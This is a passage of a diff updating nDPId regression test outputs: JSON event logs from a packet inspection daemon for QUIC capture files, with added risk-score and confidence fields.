 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1616775370814,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1616775370814,"pkt":"AAAAAAAAAAAAAAAAht1gIK6gBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB5cYRWwTYBOvDAAAAAQjg6gfRBF\/f3whbtLKZy53KxABEtrnM4d\/0kI3t2T5FO3RTETvA3HGhmrbwnQma+SPYPn8iYYuHdKaQW8SovX0+V4dnPseYO+4VTSZldeifgT8VNQQB04ta3cEyZMDpKRtegW4dekko5HPUbEiidNmSQOuP3pH\/8SoL9x7tTBQzg2OL3UpCqjAnX16pFAdQ+V\/RbqJ1eyzWFdbwBQd2HuCx\/Ij151BRRI2Xn\/z+ADB4rVF4WDOutzm10O8sh2ssLFe2YyMKEeSFhkO2WxMcAatNA2lQ4qJXI32K2kygG4WC7Q8Bb0hTFMG\/mywEn7y4151OST4nZUDKvDlYcVWjuF+qTVspa\/iH7c2UuyPhpTYvIjH0QeZUxZzZhSTFej2LWwFlP2YFzpGwiJSwBaiLMY+5\/70DioAlmqyVC7SFNLAm4+7fUc\/CJsf0f8FDbPGjMEF4r4f5+0LVZH94Uy4Wd0tsSsAOmIxjxwMYhgLVVmrVt7TBRxZotLsMMAE5KgY4C37J7AKCvvh04vXJj1z3UQVYGJh48Z9j2DH62a8\/DQXS74cUeasgoXI\/\/fcqyqG\/+dEnkEyyQl9f50ViwTzUzqhBwr01HZapB8dBBIdSdOLcU\/xu7325B4gE6MbrZr6w6DY7ChrOgc2VWwoxehsZo41rWBZsOQNIyPzLv9J0BRip+w7GJmYxc+3ube6gxdaz9W+Sn43CsbRIQrhbCgHGaXLfLG33YcaU4X+6lhZpZDIRrpfHlieNk0E4HHfvmW6nTXkwcpHKUc\/LWt5+WouHWvxMn4x+ldQDvX1+1587CV3XMwwBZM2RazatEhHW1RJ3OT+xC3gie6tmmnMQduXseFmc+V2JaT5\/q6MRU\/TlwY0Rq7EtJ8+ZbzGXqIuu4jxCx9oMmi66z65uXw3qINNOeUxHXJycpAWw5De4VzaVR4lwygzKGqlnx4L3JUveIj+oObyh7F56NqTe5C4UVw0rXOK5vqDKafrSODvkieITTgx03B2pUNKW9RLu1PhtbXUZuY0giPngPfKgjMEWwbgah5IvyTnveaL6sEqf9jfr3kFrsy+GNW\/OyorkDnRpI8RofzGw1tLxiDlPgh1n9rHyR1pRdby9Bnf\/rDHEeTaxotP0WhApggHCHa\/yFJECzVqs9aS7i2yWDcJfS40AFynUP1UGKhJe\/uUxXih7qXtheQ7FXxIkAhVv3cPoCRA71Cfs2E\/Eey1fVKRW5lMJW9PriJc7GoWtyx70pOdZsK8HXiQEPiYKJaSioN0cr28BDrpMUfunJRWn8PiLmXUmTtuIMIbhFyGy+EQ6xhnD+A\/0hLJNWNHMXLu\/kfUBoupAJQTCcfsChogaeqgD6e5eSYCN5PT9+XpGN3+Gf4PxJfDsTjsRYy9pJctfaPC3hqhyOjQKfCx2rbpvgC9PMRVByJjtLJxGnkJUAuG3l6UFakUVvosZ+5M63lUcs39+r3quiDA5yu7NAJ8A\/i87lBxkG+y1mdyDXsaBDCfcK3ZxP\/soZcY4r+0QCaSKYxK3TnciTbuVT2emgJe6oE17JFaMKL\/+oNqA3ly+Sny53LHt3DnGVzfWQGnSJpT2w1xGiily9lTfAyLsd+fvmBtuH20lp8Prs7ZgVUIGMd\/pWSRV\/g=="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1616775370814,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1616775370814,"pkt":"AAAAAAAAAAAAAAAAht1gIK6gBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB5cYRWwTYBOvIAAAAAQjg6gfRBF\/f3whbtLKZy53KxABEtnQ\/+pwGuyRXXtCPS4nq7SX6grDxLfue\/EWjBDnFsaHC\/vCyPJupYn95B94uIc35RQAXJzdsabL2pMXT5Sg\/JFun6HAUw7sNlvetq5pdG5oKE3vK\/9SDzJXTzgevEg9XCLK53vmKKNkAp8pIPL5uP852yCxWDuffTSDh3jvmocyuqPyR7wKy2amWQmRTLcjhYY1mtN\/AJ7QgugkmRPkVO\/SoOHb8vfwVTlN5QBI31Pgn0V++7rQ\/hjHjrgDqH59C7UvU4Nu\/9qoDxnTOmBoHcK94LPoI1\/y4+hexZ8e1eBwahcRgYxrP7dWTWrR+JwPD9iUpUFvxo8SIgmgVWi\/abM6MNwKmYTCNLXo60x4HtaN\/BCJP7I1SX\/LShf0cye1Of1imuBKSreuS8hR5\/tpYaSzuPld82ydSmvszAQ0GryqOJ\/ZU+jrxR3Tt\/AaRw5XB7LAQ5igi24rk0VHa8niUCDbHqUASsZJvejkDDbY6MmPqlfYaICmikKWML4UMFuk7sfDyY0i\/p8vLuvuadwwdvnNfiwmeiSJzrvtn4jKJUdczJeqQoEAINkoOw1bVBZDJVR+EUBqhm7abaUZnOPU0klsCmtzptRhvGdjGICwe3xiagqEEKgFQwB\/\/vebz12DECZEBQUukhbsCExHpl8HueAXvKSAyA62DZTnPjBbFDRoGUnmsN1w6rv\/EkKmT98KOnW\/ka23T8HpQyGW03QC+qJdzK2gggcKfOwsz6hd9z3KPjD06UASEHqfcZ0u3Yb5\/MLumpY8Low4YAuz4j1rPsR+y\/EQkWeHaYLF\/80wJp9yb7\/2p+rbsZa7D\/Pz9wdYYj0cnrXYhrg9HYHuPZ9wKDfGS5vYIihZYRGMbEMbGcFgLdOANlbTrqep7qeYaIu5bs42rtv9xGYAL49yzxTkJJj7obpk0WDg3hmOo0G0GKuMN5D3DLsd6CAekttgc\/RyQGGWPf1OdBrGOZ886sVlSYfVI53O8wLp1YwCY1QmFzdPpSevtizJ2XYvFJ+Yw3zir1qwBxD4bhntoDg+aEGwqIyiNyXgHCI13JOQpJXthbpRAj68Wk4NuVBdRmms6tJsRF69JML\/Y+B\/BUH3oVmSCNLicSWHjivNwSDG\/d7QepAS1wNYGwNmTzWQ\/PCj5j9Cdw66mm6RDZWarxDm\/oSk9NEMFrY7xKK7IeubvrPWd6WDDdJ9Bovp5NzhHiKuwVSSx\/d0e1A6bU1Fi5dfUEcrY4mCVrLQtrrzL\/UquhZSdn1pyiOy0MI0Y\/bnbB4K6J04rXZ6nEtp1EU\/NkSSyz++QGuwa8v++mBZgyRRdHXky\/yOSrTGxbmNikQP\/BXOaO3nlrxeU7SquOho6ofMGkAD9m9nnD04JBpXDbsymnBuGkTUgApPRp+NHNg+aAhwX0QXv21nT1GOJGkgZ\/kOk29raa5UerzxHP43\/ZNnwqcVGS2ek0xFdawyoi7pyvj0GVa4CngTmUuJHLHSgXXYFgoXLIzPy5xMdEYkZFlxKRT4P6vvGmfHBlL7ZZl80WmHAnvVLA4inP9N6NQ6gpEuafQMHiBC8RZ7r7p\/7NgSW8\/N+dUhCD7Bp0uOQmBUbYktydmi2FFhvERfbJQ=="}
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
+01182{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1616775370815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":116,"pkt_l4_len":62,"ts_msec":1616775370815,"pkt":"AAAAAAAAAAAAAAAAht1gJDKmAD4RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvlxgA+AFHEAAAAAQhbtLKZy53KxAjsAiiM0e27twBAHLMBaZzti3E68kx9gE3ZXKGXRNRnGzCRKG8UNXw="}
-00748{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1616775370814,"flow_last_seen":1616775370828,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3750,"flow_avg_l4_payload_len":937,"midstream":0,"ts_msec":1616775370828,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00937{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1616775370814,"flow_last_seen":1616775370828,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3750,"flow_avg_l4_payload_len":937,"midstream":0,"ts_msec":1616775370828,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00182{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 4/4
@@ -15,9 +15,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4609983 bytes
-~~ total memory freed........: 4609983 bytes
-~~ total allocations/frees...: 99580/99580
+~~ total memory allocated....: 4694936 bytes
+~~ total memory freed........: 4694936 bytes
+~~ total allocations/frees...: 101170/101170
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 187 chars
 ~~ json string max len.......: 2179 chars
diff --git a/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out b/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out
index 2e15396d7..45cae5c84 100644
--- a/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out
+++ b/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out
@@ -1,35 +1,35 @@
 00482{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621417111064,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621417111064,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTFAAH4RUm+FzUvm0OWdUdzQAbsFTtRayv8AAB0IRl3KXBW\/LTsAAEU0Yy4h2W7s\/rlLefIGYQnrzU1ux8x1WHF9P2TRMM\/uMgrk1ok5ld99474sHzCIsmBaABMBQuwajfiOypF13LdOvUbny6sKbnPsiQnWdRy34WzYDIUSWbFA\/\/FyZAuWdhVQrY6b6y6LN19n0\/TyiwQZaRgOj9Dah0V5ZEaARpJrDY9m+9WAWL1E5fl0AZB5oVrpfRpwU+72dTHjTrdezZLrG0y4LUZJV4ZFSW\/bOTNeyiYeeLzss7MCM0o7kz\/ABmlsvSTXlJ31WdTvcFfKZa+Ers7MX6vrMreYIDLD\/ts+djqt3oepBEPH1tJwybSyF6zOUmcUZSNjRN66q7NkOjxIFsUfL6vSIfs09kF5zqgt+spL3nfMkmEEbIE7Yb6VRa8aqO8bYrkMWyfbFbPBKBEuDwvxXHrKHBxwnW70rIsunEzXSGSfZXttskCHI36aQkPEEfMaooCWLD7F3ek7vQfYF9UBeP3UInD1\/fYOKKyXlh8f1Xhf5ZtTg\/t0H\/rYsiKjt\/tbN+4cOfHmb\/PbJuLAirrGtMROug44tuDQNDgTnWYAQeXIGrimS63+Je1xn8is8IMmIBVJgnKtBWcrkpMXG4qIednOh1PU3Q9\/9otFQnmPpsVeluBrkhgnE4Pv+jN7MB9MKsGF0sSC1rOxFEUDC1ZncrKF2pLDQgCdTsCDk\/CcchJ4M3KHS9yCURHTTnwtZtZ46Ba107K6\/C+vDHLLH0Agtie1px7EDwsBP1SFcU808ARQb8bGLCOen2251sgfs22LC0YsewZOMJW3COsMT7VTAQC4PFSt3Jgg155O5SMOBejKszFjP0ssLTQ45nlMeghvKmzI+zfNFO+kmZxhFyxqPlrgdV4WKrdIRZR4IDXMiiBpWoClkuM9Kcm+TctK8hPDBFox7OqpdBdHkgRVzggkNVEFUCJAoy7stynIye5G\/c0PO6aK2KvGAn+3yIbnJQO+GFl+DzzTQ5+znvJKlrrHbZJ0Q4s6V8EP7sXEgs1jrGqyCGI9wXbSo\/8wFamlp4ouFVhBqYZQ6GonLwcM2BL2EqcW1GrumcxSrpctIQbM+MLM5TmZnDMpdMZpkkzZ2HiMH1e4fDgQ6yg7Gbq1oSAP7PmPqOdaH3pXDqIE+0KyN656ZdaYb0ZW5qVxVZ\/yglBSCDTTcv+oiZZdzI4cH8Dg9AnTIhGYs97IARnzPncHqS984seVJsVe3QFzlkq7PW\/+y877P\/bFA\/sin28uLWX7d3K3IUeguTPHXWFnBk90vEPoVwUYyj9ACpdxWLYAzshM8UJ\/W4931weL+9Y45JP53CAvIUGXcyWPEbA\/HUlyizs+gfbouzc6njtiCnSFNiKixMnDd6GnBIki\/6nDKciwxPCTmggZDjKRSkhR0fon1nZO04Oy+GPjSKqyuI6I5+\/qz+87W8lrtdNnV1MTgqqBXXhQGkloYjiOOO7Hr2euMPx\/D8ZUBmzjEl1Q0vybg5VizAcIFEitV672m9tByJnZVCmqOqHSsQyStHmvXtcHwG3FmgKLlqDELNJ8refw1BcltymiFpTUHXujIq2m\/2R5lxEp3IZpg0ykJqHmAP8x1DQP1O+gpnkeZMlBn7sZgxbS5i464ONO4aidSpGEEs44YdZy\/0PLNXvbgohSN7NSSlu\/3OBSZTCjfEOkPRu9fd3b98IylU4SIOzNDcculUBKrCHb5iJqK3HKWlgukxdQQwzwn9S7alNQY70dsl9vUF76RPML6stNu2Zb+\/ZYxqaJZFu3FOvrYcXEYKZuXML8FedF"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621417111365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621417111365,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTpAAH4RUmaFzUvm0OWdUdzQAbsFTjvyyv8AAB0IRl3KXBW\/LTsAAEU0xBtknC+XTdZGN6290CAoRKHgbmKFJg3HBwc\/jHUJwoDaxdFeYCE0Uygz+VHs0HUnI94AbjhHMzRan2kJrzGOLsIFVrtNzL4OkTEDJq3UUrfyDciR9qccsfqQIGKe4+mov72jtae6dT46hkQ+QTnI3qa9w4Yrz4KUlPgfO9zVCT6mXSXTofwnKS6Qfdj9S7TH8yQuxrRDtFQWnhTNy0t1UKhz6qr7HZc7OXUxuEatCLs0GM7RQ5XDRBXA5afG92SX13U42sqpyR2Dqucjmfwt+AZJqZxKZ88XCAoPiBg1nhBBqlcLQi5b55SXRrj8J15Ch8Ci4CxPCOPzc3h\/5D7UZhbpjLoo2\/wZisT7R7KxaJ3ST2sZ3au5Hx19NvbHrwwXFyjsVWmpBliZAZ1eg8gxdq7r40u+8bSjNep5S5X4zhf+AkNuV8jevuxbg\/UwlzjTe8n2vKNO4Sn8ezT9DiH9wVxoqUgUC56J5Bw\/YU9h0I7kitWH4Ge0BODww29+Aa48fFyudGGRJr0yq65POy0\/nSLbvLGqwZp1zhAkIqUsP2zPPDhVLcbkKuUbzbLDncwcQqWbszMpdX6XQMob8NEqfarZfUbWlLQzVqNQ8t+rVuxO6E0Y5ROaqgvU6Iaw65vnffX4bnfiGXYqsNiOtVcC0AGzgdFbgZHuv2Nb7kc0byRUKspz09Wn9zWhuGfrICjWmqrB8Q4VPqUOIqhoqXlkGkHNbJf58PajF6nNTpLrSKS\/s7\/PAyhgL493GmYSfIy9P3KtC5vS4Ku0zGWvDo8SCxhl8hUKOnlaSGpXqSRi3sgHur0sAZSPpYHgQ9ljywBydFstLrd5zZwAxQ9+vV2dyvl5E10qbt3utWTyQBXOGM8+cRbZ3IceK6X8lmEcVSe\/lGIY3L8lM0BH4NVdxflARe5x27az2293PuYiWrepjLgL\/t8GJnVIEAfdEDDv6nlOl6fweFWTAviNX0n7H23ADHXDBJoQegMO44JmGpnPyeZ7peOilpkbWx9ATq+r0mZxbasRl34cc\/qUozcfhHeRKRw+hYpaT9CQZ8AwobPmbBbge1PnLbS9EJ6KIdeNM1xvj5qNQCPpdp21psJ3+wuxB5WdrC5cRGmW+pfRGXkJSm\/Hxm9DB2tYY3zfLjAKMpqTNWMC4tSeo7z0jU4yjg\/Y6fR198VAyclvSR0O5TVO1oliLvxo8sV\/3pO0ZQdkjztGQDklMECKRLmGHWeq07ToUjA7\/uq\/1q1ZaVKO9+hzMdiy8RW\/albPHuZmkMcv\/hdmGmUKrlNaBelZYm3JHfkOkgTs5ncd6giTGx3+gp+77n0Cl2X\/UMETVoN6eJC2aNdjH04XtPXdO1zEfHQdKIZ6vLfMBFcb6lyyBQHYpxqMpjOmWiEaBu7NBDgbODnVf+Tvq7iqc5vUfezJABJgNs+wQkFHvjcnsWbt8hd4lnshRnhfEICGBWv6UJsU9Ov4RS1eWGN6u+WJZ1KqUjcUa+wjrhijbGsQMvjESucpeFe9xpKA8HAlnPSJl2ONIdzQBHu\/3yzS9u2h1V7df8T\/i8Gdlu6HB93T89Yjw6chn7zm7z2FtGgcebdYl7BpQRSNjPJz84wtrOqzP5VkldxWGcJvvM9JiOiFsmosV0YXCCuN0S1I3GD34RZxvxyg8ZUjvsqRi2E\/iDILq6\/FEFNEDKUPx45Bzam\/QoSbKhlDZxaUjzLpRLnCd58YA3T6qMB7hBeBBV7m2MJBvTY86h+TNrfUyh9Qv4iQnqyGKkFDZSiO1ApSSgUS"}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621417111974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621417111974,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTtAAH4RUmWFzUvm0OWdUdzQAbsFTm5izf8AAB0IRl3KXBW\/LTsAAEU0CaUDKN+7HQerWxWNaxYxCvRcfnKOO+ybfMRaHlMyLV5\/ifvLi6NsRKmbKUNcCUu\/u\/M1kQX89iC1g71EFL9hpQHjoogBRK6XO2cU5STf5N9JHAk+8BPn45mxnB29aiUjdM+EAfIXepdjDNQjKc09rze1a+uHtprZ5+Ycrj2s1oiuYYUb9FANNRaKrpCGh8Q1rnRYx770sBfzPHCd4rH7ygHAqZA9rzQXUKNYFjXghCcBZatYZ9Q8JwAA\/fKY3\/lIAOVtIUm1GWVWJWRArYGxBCEQZpeN5QPlw8cLblO\/3AfsaykEWbI69jFCOGB2jUptGYOGveg\/lWTYc3h8ky83fW8GcKmxAdv74r3jjdjUEQwR+OklxSw8nZmJJz7vOIvvqHsGajXpc6slDSCi8t109u4JP5JW8jD8wB8Wu2rMNkpmGllvnJajJlPlmNcv1t63eJQ7tGt9eGqHfIOgL9TpzURHNTm6hgSstuIpgK9L38bDpiposW3bHdNdiSGW8YfcnS01KCB9zAXNkqgfNlW+GnajZiezd1EJNTKChMtZV3oLfDVU9cARvR9xtldNProWOwXOZYPAYtfMb\/io\/Vu5CAxNRhauAQj5iV37FvKMgojNtwe3JiavKcD\/FRmXzVU\/VpRWC0bmuCqHRqGUFP1t+DceGKbtne8WNVu\/xmWJrd890soACDHC3pcknd\/nHK1UlwSNkQ8SpuBtv6Dp3ZFRJdsGRDvauS+NTENiJpqioBeQmjGdksZRA0\/zyeeZ2tToLKwCsABDpjD3wQPTSgs\/QdPv\/A5+SuOjcGiYVuktFgslT0Wy1tyms3TA36Wcl6ZEPkQlM\/omx0Cr54NreGjEi+Vm5kYjmT2fnBvf2AQ12Dg9A+pCWtWa4LMGgtYYMDVRRT6vqKnhbVtxxQSAh\/MWBMyqiQHkkkf\/vXhJ\/dOU8N1Fd1mO1KBRln61my9oJczDOwipHZPAlr14xAsdkdGB\/+HZ8ppEuJtqtkEtcOw9xjC5dCPbakUtfuaLzDo4DHXPrpt\/f+rpZlU81EBxJG0afG0vQOyE3ZuYMlkM4IVgPqMx+uzy+sK+2o1w+yZCywDlXOysJF2R8BE\/KVLZRpL6uxsfUOFnHV4VQFOd3VwykNOtm7wpKwJ8ySG1VrRqSLuw3SlZ8dJXFZ8gIUVHRRjp13ey\/kua7zLPrAEFz2vf1ZYTZ5m6U9KeweZA3wPOuih84JbuHHl9vlsWDb7s9qrasejaGIRTS0yaEkKOXG2aXkwOTKzHvuE0KuunSsQcA3e6JAQXrlvgeRH7cNh8q5Noilga8Iz99iaZ+tph0kvufCI2CHlp41d